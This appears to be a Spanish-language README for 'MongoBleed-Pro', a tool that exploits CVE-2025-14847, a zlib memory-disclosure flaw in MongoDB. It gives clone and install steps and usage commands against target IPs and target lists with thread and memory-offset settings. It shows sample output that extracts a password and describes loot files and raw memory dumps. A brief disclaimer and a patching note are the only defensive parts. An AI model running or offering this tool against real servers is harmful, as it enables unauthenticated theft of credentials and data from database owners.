
una vulnerabilidad crítica de divulgación de memoria en el manejo de compresión zlib de MongoDB. Esta herramienta permite a los investigadores de seguridad extraer datos sensibles de instancias vulnerables de MongoDB.
Herramienta avanzada de explotación de fugas de memoria de MongoDB
Sigue aprendiendo | Sigue hackeando con CyberTechAjju
MongoBleed-Pro es una herramienta avanzada de explotación para CVE-2025-14847, una vulnerabilidad crítica de divulgación de memoria en el manejo de compresión zlib de MongoDB. Esta herramienta permite a los investigadores de seguridad extraer datos sensibles de instancias vulnerables de MongoDB.
Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas.
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| Archivo | Descripción |
|---|---|
loot_<host>.txt | Secretos extraídos en formato legible |
dump_<host>.bin | Volcado de memoria sin procesar para análisis manual |
Si eres administrador de MongoDB, actualiza a las versiones parcheadas:
CyberTechAjju
Este proyecto está licenciado bajo la Licencia MIT - consulta el archivo LICENSE para más detalles.
Si encontraste útil esta herramienta, ¡dale una ⭐ en GitHub!
「 Sigue aprendiendo | Sigue hackeando 」
Hecho con ❤️ por CyberTechAjju
| Propiedad | Detalles |
|---|
| CVE ID | CVE-2025-14847 |
| Tipo de vulnerabilidad | Divulgación de memoria |
| Versiones afectadas | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| Causa raíz | Sobreelectura de búfer en la descompresión zlib |
| Impacto | Fuga de memoria remota no autenticada |
| Argumento | Descripción | Por defecto |
|---|
--target | IP/URL objetivo | Símbolo interactivo |
--file | Archivo con lista de objetivos | Ninguno |
--threads | Número de hilos | 50 |
--min-offset | Desplazamiento mínimo de memoria | 20 |
--max-offset | Desplazamiento máximo de memoria | 8192 |